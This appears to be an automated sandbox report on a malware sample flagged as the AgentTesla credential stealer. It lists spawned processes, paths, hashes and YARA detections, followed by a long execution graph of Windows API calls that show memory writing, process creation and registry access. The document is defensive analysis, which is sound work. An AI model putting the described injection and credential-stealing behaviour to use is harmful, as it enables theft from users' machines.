                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Has exited:true

                                                                                                                  Target ID:30
                                                                                                                  Start time:09:28:35
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:68'096 bytes
                                                                                                                  MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:31
                                                                                                                  Start time:09:28:37
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                  Imagebase:0x990000
                                                                                                                  File size:250'368 bytes
                                                                                                                  MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  Target ID:32
                                                                                                                  Start time:09:28:37
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                  Imagebase:0xa20000
                                                                                                                  File size:231'936 bytes
                                                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:33
                                                                                                                  Start time:09:28:43
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                  Imagebase:0x4e0000
                                                                                                                  File size:231'936 bytes
                                                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:16.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:30.9%
                                                                                                                    Total number of Nodes:1639
                                                                                                                    Total number of Limit Nodes:19
                                                                                                                    execution_graph 32615 2d94edc 32616 2d94ee9 32615->32616 32620 2d94ef0 32615->32620 32621 2d94c38 32616->32621 32627 2d94c50 32620->32627 32622 2d94c4c 32621->32622 32623 2d94c3c SysAllocStringLen 32621->32623 32622->32620 32623->32622 32624 2d94c30 32623->32624 32625 2d94f3c 32624->32625 32626 2d94f26 SysAllocStringLen 32624->32626 32625->32620 32626->32624 32626->32625 32628 2d94c5c 32627->32628 32629 2d94c56 SysFreeString 32627->32629 32629->32628 32630 2d91c6c 32631 2d91c7c 32630->32631 32632 2d91d04 32630->32632 32633 2d91c89 32631->32633 32634 2d91cc0 32631->32634 32635 2d91f58 32632->32635 32636 2d91d0d 32632->32636 32637 2d91c94 32633->32637 32678 2d91724 32633->32678 32641 2d91724 10 API calls 32634->32641 32638 2d91fec 32635->32638 32643 2d91f68 32635->32643 32644 2d91fac 32635->32644 32639 2d91d25 32636->32639 32640 2d91e24 32636->32640 32645 2d91d2c 32639->32645 32650 2d91d48 32639->32650 32652 2d91dfc 32639->32652 32653 2d91e7c 32640->32653 32654 2d91e55 Sleep 32640->32654 32662 2d91e95 32640->32662 32646 2d91cd7 32641->32646 32648 2d91724 10 API calls 32643->32648 32647 2d91fb2 32644->32647 32651 2d91724 10 API calls 32644->32651 32661 2d91a8c 8 API calls 32646->32661 32666 2d91cfd 32646->32666 32667 2d91f82 32648->32667 32649 2d91724 10 API calls 32665 2d91f2c 32649->32665 32655 2d91d79 Sleep 32650->32655 32660 2d91d9c 32650->32660 32668 2d91fc1 32651->32668 32657 2d91724 10 API calls 32652->32657 32653->32649 32653->32662 32654->32653 32658 2d91e6f Sleep 32654->32658 32659 2d91d91 Sleep 32655->32659 32655->32660 32656 2d91ca1 32669 2d91cb9 32656->32669 32702 2d91a8c 32656->32702 32671 2d91e05 32657->32671 32658->32640 32659->32650 32661->32666 32664 2d91e1d 32665->32662 32670 2d91a8c 8 API calls 32665->32670 32672 2d91a8c 8 API calls 32667->32672 32675 2d91fa7 32667->32675 32668->32675 32676 2d91a8c 8 API calls 32668->32676 32673 2d91f50 32670->32673 32671->32664 32674 2d91a8c 8 API calls 32671->32674 32672->32675 32674->32664 32677 2d91fe4 32676->32677 32679 2d91968 32678->32679 32680 2d9173c 32678->32680 32681 2d91a80 32679->32681 32682 2d91938 32679->32682 32691 2d917cb Sleep 32680->32691 32692 2d9174e 32680->32692 32684 2d91a89 32681->32684 32685 2d91684 VirtualAlloc 32681->32685 32688 2d91947 Sleep 32682->32688 32694 2d91986 32682->32694 32683 2d9175d 32683->32656 32684->32656 32686 2d916bf 32685->32686 32687 2d916af 32685->32687 32686->32656 32719 2d91644 32687->32719 32690 2d9195d Sleep 32688->32690 32688->32694 32690->32682 32691->32692 32693 2d917e4 Sleep 32691->32693 32692->32683 32695 2d9180a Sleep 32692->32695 32696 2d9182c 32692->32696 32693->32680 32697 2d919a4 32694->32697 32698 2d915cc VirtualAlloc 32694->32698 32695->32696 32699 2d91820 Sleep 32695->32699 32701 2d91838 32696->32701 32725 2d915cc 32696->32725 32697->32656 32698->32697 32699->32692 32701->32656 32703 2d91b6c 32702->32703 32704 2d91aa1 32702->32704 32705 2d916e8 32703->32705 32706 2d91aa7 32703->32706 32704->32706 32707 2d91b13 Sleep 32704->32707 32709 2d91c66 32705->32709 32712 2d91644 2 API calls 32705->32712 32708 2d91ab0 32706->32708 32711 2d91b4b Sleep 32706->32711 32716 2d91b81 32706->32716 32707->32706 32710 2d91b2d Sleep 32707->32710 32708->32669 32709->32669 32710->32704 32713 2d91b61 Sleep 32711->32713 32711->32716 32714 2d916f5 VirtualFree 32712->32714 32713->32706 32715 2d9170d 32714->32715 32715->32669 32717 2d91c00 VirtualFree 32716->32717 32718 2d91ba4 32716->32718 32717->32669 32718->32669 32720 2d91681 32719->32720 32721 2d9164d 32719->32721 32720->32686 32721->32720 32722 2d9164f Sleep 32721->32722 32723 2d91664 32722->32723 32723->32720 32724 2d91668 Sleep 32723->32724 32724->32721 32729 2d91560 32725->32729 32727 2d915d4 VirtualAlloc 32728 2d915eb 32727->32728 32728->32701 32730 2d91500 32729->32730 32730->32727 32731 2dbd2fc 32741 2d9656c 32731->32741 32735 2dbd32a 32746 2dbc35c timeSetEvent 32735->32746 32737 2dbd334 32738 2dbd342 GetMessageA 32737->32738 32739 2dbd352 32738->32739 32740 2dbd336 TranslateMessage DispatchMessageA 32738->32740 32740->32738 32742 2d96577 32741->32742 32747 2d94198 32742->32747 32745 2d942ac SysFreeString SysReAllocStringLen SysAllocStringLen 32745->32735 32746->32737 32748 2d941de 32747->32748 32749 2d943e8 32748->32749 32750 2d94257 32748->32750 32752 2d94419 32749->32752 32756 2d9442a 32749->32756 32761 2d94130 32750->32761 32766 2d9435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 32752->32766 32755 2d94423 32755->32756 32757 2d9446f FreeLibrary 32756->32757 32758 2d94493 32756->32758 32757->32756 32759 2d9449c 32758->32759 32760 2d944a2 ExitProcess 32758->32760 32759->32760 32762 2d94173 32761->32762 32763 2d94140 32761->32763 32762->32745 32763->32762 32765 2d915cc VirtualAlloc 32763->32765 32767 2d95868 32763->32767 32765->32763 32766->32755 32768 2d95878 GetModuleFileNameA 32767->32768 32769 2d95894 32767->32769 32771 2d95acc GetModuleFileNameA RegOpenKeyExA 32768->32771 32769->32763 32772 2d95b4f 32771->32772 32773 2d95b0f RegOpenKeyExA 32771->32773 32789 2d95908 12 API calls 32772->32789 32773->32772 32774 2d95b2d RegOpenKeyExA 32773->32774 32774->32772 32776 2d95bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 32774->32776 32780 2d95c0f 32776->32780 32781 2d95cf2 32776->32781 32777 2d95b74 RegQueryValueExA 32778 2d95b94 RegQueryValueExA 32777->32778 32779 2d95bb2 RegCloseKey 32777->32779 32778->32779 32779->32769 32780->32781 32783 2d95c1f lstrlenA 32780->32783 32781->32769 32784 2d95c37 32783->32784 32784->32781 32785 2d95c5c lstrcpynA LoadLibraryExA 32784->32785 32786 2d95c84 32784->32786 32785->32786 32786->32781 32787 2d95c8e lstrcpynA LoadLibraryExA 32786->32787 32787->32781 32788 2d95cc0 lstrcpynA LoadLibraryExA 32787->32788 32788->32781 32789->32777 32790 2db3e12 34336 2d94860 32790->34336 34337 2d94871 34336->34337 34338 2d948ae 34337->34338 34339 2d94897 34337->34339 34354 2d945a0 34338->34354 34345 2d94bcc 34339->34345 34342 2d948df 34343 2d948a4 34343->34342 34359 2d94530 34343->34359 34346 2d94bd9 34345->34346 34353 2d94c09 34345->34353 34348 2d94c02 34346->34348 34351 2d94be5 34346->34351 34349 2d945a0 11 API calls 34348->34349 34349->34353 34350 2d94bf3 34350->34343 34365 2d92c44 11 API calls 34351->34365 34366 2d944dc 34353->34366 34355 2d945c8 34354->34355 34356 2d945a4 34354->34356 34355->34343 34379 2d92c10 34356->34379 34358 2d945b1 34358->34343 34360 2d94534 34359->34360 34363 2d94544 34359->34363 34362 2d945a0 11 API calls 34360->34362 34360->34363 34361 2d94572 34361->34342 34362->34363 34363->34361 34364 2d92c2c 11 API calls 34363->34364 34364->34361 34365->34350 34367 2d944fd 34366->34367 34368 2d944e2 34366->34368 34367->34350 34368->34367 34370 2d92c2c 34368->34370 34371 2d92c3a 34370->34371 34373 2d92c30 34370->34373 34371->34367 34372 2d92d19 34378 2d92ce8 7 API calls 34372->34378 34373->34371 34373->34372 34377 2d96520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 34373->34377 34376 2d92d3a 34376->34367 34377->34372 34378->34376 34380 2d92c27 34379->34380 34383 2d92c14 34379->34383 34380->34358 34381 2d92c1e 34381->34358 34382 2d92d19 34388 2d92ce8 7 API calls 34382->34388 34383->34381 34383->34382 34387 2d96520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 34383->34387 34386 2d92d3a 34386->34358 34387->34382 34388->34386 34389 2dbc350 34392 2daf7c8 34389->34392 34393 2daf7d0 34392->34393 34393->34393 34394 2daf7d7 34393->34394 36806 2da88b8 LoadLibraryW 34394->36806 34396 2daf7f1 36811 2d92ee0 QueryPerformanceCounter 34396->36811 34398 2daf7f6 34399 2daf800 InetIsOffline 34398->34399 34400 2daf80a 34399->34400 34401 2daf81b 34399->34401 34402 2d94530 11 API calls 34400->34402 34403 2d94530 11 API calls 34401->34403 34404 2daf819 34402->34404 34403->34404 34405 2d94860 11 API calls 34404->34405 34406 2daf848 34405->34406 34407 2daf850 34406->34407 34408 2daf85a 34407->34408 36814 2d947ec 34408->36814 34410 2daf873 34411 2daf87b 34410->34411 34412 2daf885 34411->34412 36829 2da89d0 34412->36829 34415 2d94860 11 API calls 34416 2daf8ac 34415->34416 34417 2daf8b4 34416->34417 36842 2d946d4 34417->36842 36844 2da8274 36806->36844 36808 2da88f1 36855 2da7d78 36808->36855 36812 2d92ef8 GetTickCount 36811->36812 36813 2d92eed 36811->36813 36812->34398 36813->34398 36815 2d94851 36814->36815 36816 2d947f0 36814->36816 36817 2d947f8 36816->36817 36818 2d94530 36816->36818 36817->36815 36819 2d94807 36817->36819 36821 2d94530 11 API calls 36817->36821 36822 2d945a0 11 API calls 36818->36822 36824 2d94544 36818->36824 36823 2d945a0 11 API calls 36819->36823 36820 2d94572 36820->34410 36821->36819 36822->36824 36826 2d94821 36823->36826 36824->36820 36825 2d92c2c 11 API calls 36824->36825 36825->36820 36827 2d94530 11 API calls 36826->36827 36828 2d9484d 36827->36828 36828->34410 36830 2da89e4 36829->36830 36831 2da81cc 17 API calls 36830->36831 36832 2da8a1d 36831->36832 36833 2da8274 15 API calls 36832->36833 36834 2da8a36 36833->36834 36835 2da7d78 18 API calls 36834->36835 36836 2da8a95 36835->36836 36891 2da8338 36836->36891 36839 2da8abc 36840 2d94500 11 API calls 36839->36840 36841 2da8ac9 36840->36841 36841->34415 36843 2d946da 36842->36843 36845 2d94530 11 API calls 36844->36845 36846 2da8299 36845->36846 36869 2da798c 36846->36869 36849 2d947ec 11 API calls 36850 2da82b3 36849->36850 36851 2da82bb GetModuleHandleW GetProcAddress GetProcAddress 36850->36851 36852 2da82ee 36851->36852 36875 2d94500 36852->36875 36856 2d94530 11 API calls 36855->36856 36857 2da7d9d 36856->36857 36858 2da798c 12 API calls 36857->36858 36859 2da7daa 36858->36859 36860 2d947ec 11 API calls 36859->36860 36861 2da7dba 36860->36861 36880 2da81cc 36861->36880 36864 2da8274 15 API calls 36865 2da7dd3 NtWriteVirtualMemory 36864->36865 36866 2da7dff 36865->36866 36867 2d94500 11 API calls 36866->36867 36868 2da7e0c FreeLibrary 36867->36868 36868->34396 36870 2da799d 36869->36870 36871 2d94bcc 11 API calls 36870->36871 36874 2da79ad 36871->36874 36872 2da7a19 36872->36849 36874->36872 36879 2d9babc CharNextA 36874->36879 36876 2d94506 36875->36876 36877 2d9452c 36876->36877 36878 2d92c2c 11 API calls 36876->36878 36877->36808 36878->36876 36879->36874 36881 2d94530 11 API calls 36880->36881 36882 2da81ef 36881->36882 36883 2da798c 12 API calls 36882->36883 36884 2da81fc 36883->36884 36885 2da8204 GetModuleHandleA 36884->36885 36886 2da8274 15 API calls 36885->36886 36887 2da8215 GetModuleHandleA 36886->36887 36888 2da8233 36887->36888 36889 2d944dc 11 API calls 36888->36889 36890 2da7dcd 36889->36890 36890->36864 36892 2d94530 11 API calls 36891->36892 36893 2da835b 36892->36893 36894 2d94860 11 API calls 36893->36894 36895 2da837a 36894->36895 36896 2da81cc 17 API calls 36895->36896 36897 2da838d 36896->36897 36898 2da8274 15 API calls 36897->36898 36899 2da8393 FlushInstructionCache 36898->36899 36900 2da83b9 36899->36900 36901 2d944dc 11 API calls 36900->36901 36902 2da83c1 FreeLibrary 36901->36902 36902->36839 36903 2db7074 36904 2d94860 11 API calls 36903->36904 36905 2db7095 36904->36905 36906 2d947ec 11 API calls 36905->36906 36907 2db70cc 36906->36907 36908 2da89d0 20 API calls 36907->36908 36909 2db70f0 36908->36909 36910 2d94860 11 API calls 36909->36910 36911 2db7111 36910->36911 36912 2d947ec 11 API calls 36911->36912 36913 2db7148 36912->36913 36914 2da89d0 20 API calls 36913->36914 36915 2db716c 36914->36915 36916 2d94860 11 API calls 36915->36916 36917 2db718d 36916->36917 36918 2d947ec 11 API calls 36917->36918 36919 2db71c4 36918->36919 36920 2da89d0 20 API calls 36919->36920 36921 2db71e8 36920->36921 36922 2d94860 11 API calls 36921->36922 36923 2db7209 36922->36923 36924 2d947ec 11 API calls 36923->36924 36925 2db7240 36924->36925 36926 2da89d0 20 API calls 36925->36926 36927 2db7264 36926->36927 36928 2d94860 11 API calls 36927->36928 36929 2db7285 36928->36929 36930 2d947ec 11 API calls 36929->36930 36931 2db72bc 36930->36931 36932 2da89d0 20 API calls 36931->36932 36933 2db72e0 36932->36933 36934 2d94860 11 API calls 36933->36934 36935 2db731a 36934->36935 37724 2dae0f8 36935->37724 36937 2db7349 37734 2daf214 36937->37734 36940 2d94860 11 API calls 36941 2db7399 36940->36941 36942 2d947ec 11 API calls 36941->36942 36943 2db73d0 36942->36943 36944 2da89d0 20 API calls 36943->36944 36945 2db73f4 36944->36945 36946 2d94860 11 API calls 36945->36946 36947 2db7415 36946->36947 36948 2d947ec 11 API calls 36947->36948 36949 2db744c 36948->36949 36950 2da89d0 20 API calls 36949->36950 36951 2db7470 36950->36951 36952 2d94860 11 API calls 36951->36952 36953 2db7491 36952->36953 36954 2d947ec 11 API calls 36953->36954 36955 2db74c8 36954->36955 36956 2da89d0 20 API calls 36955->36956 36957 2db74ec 36956->36957 36958 2d94860 11 API calls 36957->36958 36959 2db750d 36958->36959 36960 2d947ec 11 API calls 36959->36960 36961 2db7544 36960->36961 36962 2da89d0 20 API calls 36961->36962 36963 2db7568 36962->36963 36964 2d94860 11 API calls 36963->36964 36965 2db7589 36964->36965 36966 2d947ec 11 API calls 36965->36966 36967 2db75c0 36966->36967 36968 2da89d0 20 API calls 36967->36968 36969 2db75e4 36968->36969 36970 2d94860 11 API calls 36969->36970 36971 2db7605 36970->36971 36972 2d947ec 11 API calls 36971->36972 36973 2db763c 36972->36973 36974 2da89d0 20 API calls 36973->36974 36975 2db7660 36974->36975 36976 2d94860 11 API calls 36975->36976 36977 2db7681 36976->36977 36978 2d947ec 11 API calls 36977->36978 36979 2db76b8 36978->36979 36980 2da89d0 20 API calls 36979->36980 36981 2db76dc 36980->36981 36982 2d94860 11 API calls 36981->36982 36983 2db76fd 36982->36983 36984 2d947ec 11 API calls 36983->36984 36985 2db7734 36984->36985 36986 2da89d0 20 API calls 36985->36986 36987 2db7758 36986->36987 36988 2d94860 11 API calls 36987->36988 36989 2db7779 36988->36989 36990 2d947ec 11 API calls 36989->36990 36991 2db77b0 36990->36991 36992 2da89d0 20 API calls 36991->36992 36993 2db77d4 36992->36993 36994 2db77e9 36993->36994 36995 2db8318 36993->36995 36996 2d94860 11 API calls 36994->36996 36997 2d94860 11 API calls 36995->36997 36999 2db780a 36996->36999 36998 2db8339 36997->36998 37000 2d947ec 11 API calls 36998->37000 37001 2d947ec 11 API calls 36999->37001 37002 2db8370 37000->37002 37003 2db7841 37001->37003 37004 2da89d0 20 API calls 37002->37004 37005 2da89d0 20 API calls 37003->37005 37006 2db8394 37004->37006 37007 2db7865 37005->37007 37008 2d94860 11 API calls 37006->37008 37009 2d94860 11 API calls 37007->37009 37011 2db83b5 37008->37011 37010 2db7886 37009->37010 37013 2d947ec 11 API calls 37010->37013 37012 2d947ec 11 API calls 37011->37012 37014 2db83ec 37012->37014 37015 2db78bd 37013->37015 37016 2da89d0 20 API calls 37014->37016 37017 2da89d0 20 API calls 37015->37017 37018 2db8410 37016->37018 37019 2db78e1 37017->37019 37020 2d94860 11 API calls 37018->37020 37021 2d94860 11 API calls 37019->37021 37023 2db8431 37020->37023 37022 2db7902 37021->37022 37024 2d947ec 11 API calls 37022->37024 37025 2d947ec 11 API calls 37023->37025 37027 2db7939 37024->37027 37026 2db8468 37025->37026 37028 2da89d0 20 API calls 37026->37028 37029 2da89d0 20 API calls 37027->37029 37030 2db848c 37028->37030 37031 2db795d 37029->37031 37032 2d94860 11 API calls 37030->37032 37033 2d947ec 11 API calls 37031->37033 37035 2db84ad 37032->37035 37034 2db7975 37033->37034 38184 2da85bc 37034->38184 37039 2d947ec 11 API calls 37035->37039 37038 2d94860 11 API calls 37041 2db79a7 37038->37041 37040 2db84e4 37039->37040 37042 2da89d0 20 API calls 37040->37042 37043 2d947ec 11 API calls 37041->37043 37044 2db8508 37042->37044 37047 2db79de 37043->37047 37045 2db851d 37044->37045 37046 2db93a1 37044->37046 37049 2d94860 11 API calls 37045->37049 37048 2d94860 11 API calls 37046->37048 37051 2da89d0 20 API calls 37047->37051 37054 2db93c2 37048->37054 37050 2db853e 37049->37050 37055 2db8556 37050->37055 37052 2db7a02 37051->37052 37053 2d94860 11 API calls 37052->37053 37058 2db7a23 37053->37058 37056 2d947ec 11 API calls 37054->37056 37057 2d947ec 11 API calls 37055->37057 37062 2db93f9 37056->37062 37059 2db8575 37057->37059 37060 2d947ec 11 API calls 37058->37060 37061 2db858d 37059->37061 37067 2db7a5a 37060->37067 37063 2da89d0 20 API calls 37061->37063 37064 2da89d0 20 API calls 37062->37064 37066 2db8599 37063->37066 37065 2db941d 37064->37065 37068 2d94860 11 API calls 37065->37068 37069 2d94860 11 API calls 37066->37069 37071 2da89d0 20 API calls 37067->37071 37074 2db943e 37068->37074 37070 2db85ba 37069->37070 37075 2db85c5 37070->37075 37072 2db7a7e 37071->37072 37073 2d94860 11 API calls 37072->37073 37078 2db7a9f 37073->37078 37076 2d947ec 11 API calls 37074->37076 37077 2d947ec 11 API calls 37075->37077 37081 2db9475 37076->37081 37079 2db85f1 37077->37079 37080 2d947ec 11 API calls 37078->37080 37082 2db85fc 37079->37082 37086 2db7ad6 37080->37086 37084 2da89d0 20 API calls 37081->37084 37083 2da89d0 20 API calls 37082->37083 37085 2db8615 37083->37085 37087 2db9499 37084->37087 37088 2d94860 11 API calls 37085->37088 37090 2da89d0 20 API calls 37086->37090 37089 2d94860 11 API calls 37087->37089 37092 2db8636 37088->37092 37091 2db94ba 37089->37091 37093 2db7afa 37090->37093 37094 2d947ec 11 API calls 37091->37094 37095 2d947ec 11 API calls 37092->37095 38196 2daadf8 29 API calls 37093->38196 37099 2db94f1 37094->37099 37100 2db866d 37095->37100 37097 2db7b21 37098 2d94860 11 API calls 37097->37098 37104 2db7b42 37098->37104 37101 2da89d0 20 API calls 37099->37101 37102 2da89d0 20 API calls 37100->37102 37111 2db9515 37101->37111 37103 2db8691 37102->37103 37105 2d947ec 11 API calls 37103->37105 37107 2d947ec 11 API calls 37104->37107 37106 2db86bd 37105->37106 37110 2db86d5 37106->37110 37112 2db7b79 37107->37112 37108 2db9cf5 37109 2d94860 11 API calls 37108->37109 37114 2db9d16 37109->37114 37115 2db86e0 CreateProcessAsUserW 37110->37115 37111->37108 37113 2d94860 11 API calls 37111->37113 37116 2da89d0 20 API calls 37112->37116 37124 2db9560 37113->37124 37120 2d947ec 11 API calls 37114->37120 37117 2db876e 37115->37117 37118 2db86f2 37115->37118 37119 2db7b9d 37116->37119 37121 2d94860 11 API calls 37117->37121 37122 2d94860 11 API calls 37118->37122 37123 2d94860 11 API calls 37119->37123 37129 2db9d4d 37120->37129 37130 2db878f 37121->37130 37125 2db8713 37122->37125 37128 2db7bbe 37123->37128 37126 2d947ec 11 API calls 37124->37126 37127 2db871e 37125->37127 37136 2db9597 37126->37136 37131 2d947ec 11 API calls 37127->37131 37132 2d947ec 11 API calls 37128->37132 37133 2da89d0 20 API calls 37129->37133 37134 2d947ec 11 API calls 37130->37134 37135 2db874a 37131->37135 37143 2db7bf5 37132->37143 37137 2db9d71 37133->37137 37142 2db87c6 37134->37142 37139 2db8755 37135->37139 37140 2da89d0 20 API calls 37136->37140 37138 2d94860 11 API calls 37137->37138 37145 2db9d92 37138->37145 37147 2da89d0 20 API calls 37139->37147 37141 2db95bb 37140->37141 37144 2d94860 11 API calls 37141->37144 37146 2da89d0 20 API calls 37142->37146 37148 2da89d0 20 API calls 37143->37148 37154 2db95dc 37144->37154 37151 2d947ec 11 API calls 37145->37151 37149 2db87ea 37146->37149 37147->37117 37150 2db7c19 37148->37150 37152 2d94860 11 API calls 37149->37152 37153 2d94860 11 API calls 37150->37153 37157 2db9dc9 37151->37157 37158 2db880b 37152->37158 37156 2db7c3a 37153->37156 37155 2d947ec 11 API calls 37154->37155 37162 2db9613 37155->37162 37159 2d947ec 11 API calls 37156->37159 37160 2da89d0 20 API calls 37157->37160 37161 2d947ec 11 API calls 37158->37161 37167 2db7c71 37159->37167 37163 2db9ded 37160->37163 37166 2db8842 37161->37166 37165 2da89d0 20 API calls 37162->37165 37164 2d94860 11 API calls 37163->37164 37171 2db9e0e 37164->37171 37168 2db9637 37165->37168 37172 2da89d0 20 API calls 37166->37172 37173 2da89d0 20 API calls 37167->37173 37169 2d94860 11 API calls 37168->37169 37170 2db9658 37169->37170 37180 2d947ec 11 API calls 37170->37180 37176 2d947ec 11 API calls 37171->37176 37174 2db8866 37172->37174 37175 2db7c95 37173->37175 37177 2d949f8 11 API calls 37174->37177 37179 2d94860 11 API calls 37175->37179 37181 2db9e45 37176->37181 37178 2db888a 37177->37178 37182 2d94860 11 API calls 37178->37182 37183 2db7cd5 37179->37183 37186 2db968f 37180->37186 37184 2da89d0 20 API calls 37181->37184 37185 2db88b9 37182->37185 37187 2d947ec 11 API calls 37183->37187 37190 2db9e69 37184->37190 37191 2db88c4 37185->37191 37188 2da89d0 20 API calls 37186->37188 37196 2db7d0c 37187->37196 37189 2db96b3 37188->37189 37746 2daf094 37189->37746 37194 2da89d0 20 API calls 37190->37194 37192 2d947ec 11 API calls 37191->37192 37195 2db88f0 37192->37195 37201 2db9e9c 37194->37201 37202 2db88fb 37195->37202 37199 2da89d0 20 API calls 37196->37199 37198 2d94860 11 API calls 37204 2db96f7 37198->37204 37200 2db7d30 37199->37200 37203 2d94860 11 API calls 37200->37203 37206 2da89d0 20 API calls 37201->37206 37205 2da89d0 20 API calls 37202->37205 37210 2db7d51 37203->37210 37208 2d94860 11 API calls 37204->37208 37207 2db8914 37205->37207 37212 2db9ecf 37206->37212 37209 2d94860 11 API calls 37207->37209 37213 2db972f 37208->37213 37214 2db8935 37209->37214 37211 2d947ec 11 API calls 37210->37211 37218 2db7d88 37211->37218 37215 2da89d0 20 API calls 37212->37215 37216 2d947ec 11 API calls 37213->37216 37217 2d947ec 11 API calls 37214->37217 37219 2db9f02 37215->37219 37223 2db9766 37216->37223 37221 2db896c 37217->37221 37220 2da89d0 20 API calls 37218->37220 37224 2da89d0 20 API calls 37219->37224 37222 2db7dac 37220->37222 37228 2da89d0 20 API calls 37221->37228 37225 2d94860 11 API calls 37222->37225 37226 2da89d0 20 API calls 37223->37226 37227 2db9f35 37224->37227 37234 2db7dcd 37225->37234 37229 2db978a 37226->37229 37230 2d94860 11 API calls 37227->37230 37231 2db8990 37228->37231 37232 2d94860 11 API calls 37229->37232 37235 2db9f56 37230->37235 37233 2d94860 11 API calls 37231->37233 37237 2db97ab 37232->37237 37238 2db89b1 37233->37238 37236 2d947ec 11 API calls 37234->37236 37239 2d947ec 11 API calls 37235->37239 37242 2db7e04 37236->37242 37240 2d947ec 11 API calls 37237->37240 37241 2d947ec 11 API calls 37238->37241 37244 2db9f8d 37239->37244 37247 2db97e2 37240->37247 37245 2db89e8 37241->37245 37243 2da89d0 20 API calls 37242->37243 37246 2db7e28 37243->37246 37248 2da89d0 20 API calls 37244->37248 37251 2da89d0 20 API calls 37245->37251 38197 2da5aec 42 API calls 37246->38197 37253 2da89d0 20 API calls 37247->37253 37250 2db9fb1 37248->37250 37255 2d94860 11 API calls 37250->37255 37256 2db8a0c 37251->37256 37254 2db9806 37253->37254 37753 2d97e5c 37254->37753 37267 2db9fd2 37255->37267 38200 2dad164 23 API calls 37256->38200 37257 2db7e54 37264 2d94bcc 11 API calls 37257->37264 37261 2db8a20 37263 2d94860 11 API calls 37261->37263 37262 2db9aef 37266 2d94860 11 API calls 37262->37266 37271 2db8a46 37263->37271 37268 2db7e69 37264->37268 37265 2d94860 11 API calls 37272 2db9839 37265->37272 37273 2db9b10 37266->37273 37270 2d947ec 11 API calls 37267->37270 37269 2d94860 11 API calls 37268->37269 37274 2db7e8a 37269->37274 37278 2dba009 37270->37278 37275 2d947ec 11 API calls 37271->37275 37276 2d947ec 11 API calls 37272->37276 37277 2d947ec 11 API calls 37273->37277 37279 2d947ec 11 API calls 37274->37279 37281 2db8a7d 37275->37281 37285 2db9870 37276->37285 37283 2db9b47 37277->37283 37280 2da89d0 20 API calls 37278->37280 37287 2db7ec1 37279->37287 37282 2dba02d 37280->37282 37286 2da89d0 20 API calls 37281->37286 37284 2d94860 11 API calls 37282->37284 37289 2da89d0 20 API calls 37283->37289 37297 2dba04e 37284->37297 37288 2da89d0 20 API calls 37285->37288 37290 2db8aa1 37286->37290 37294 2da89d0 20 API calls 37287->37294 37291 2db9894 37288->37291 37292 2db9b6b 37289->37292 37293 2d94860 11 API calls 37290->37293 37295 2d94860 11 API calls 37291->37295 37296 2d94860 11 API calls 37292->37296 37300 2db8ac2 37293->37300 37298 2db7ee5 37294->37298 37302 2db98b5 37295->37302 37303 2db9b8c 37296->37303 37299 2d947ec 11 API calls 37297->37299 37301 2d949f8 11 API calls 37298->37301 37310 2dba085 37299->37310 37306 2d947ec 11 API calls 37300->37306 37304 2db7f02 37301->37304 37308 2d947ec 11 API calls 37302->37308 37309 2d947ec 11 API calls 37303->37309 38198 2da7e50 17 API calls 37304->38198 37313 2db8af9 37306->37313 37307 2db7f08 37311 2d94860 11 API calls 37307->37311 37314 2db98ec 37308->37314 37315 2db9bc3 37309->37315 37312 2da89d0 20 API calls 37310->37312 37317 2db7f29 37311->37317 37319 2dba0a9 37312->37319 37316 2da89d0 20 API calls 37313->37316 37321 2da89d0 20 API calls 37314->37321 37318 2da89d0 20 API calls 37315->37318 37320 2db8b1d 37316->37320 37324 2d947ec 11 API calls 37317->37324 37322 2db9be7 37318->37322 37328 2da89d0 20 API calls 37319->37328 37323 2d94860 11 API calls 37320->37323 37325 2db9910 37321->37325 37327 2d94860 11 API calls 37322->37327 37329 2db8b3e 37323->37329 37330 2db7f60 37324->37330 37326 2d94860 11 API calls 37325->37326 37331 2db9931 37326->37331 37332 2db9c08 37327->37332 37333 2dba0dc 37328->37333 37334 2d947ec 11 API calls 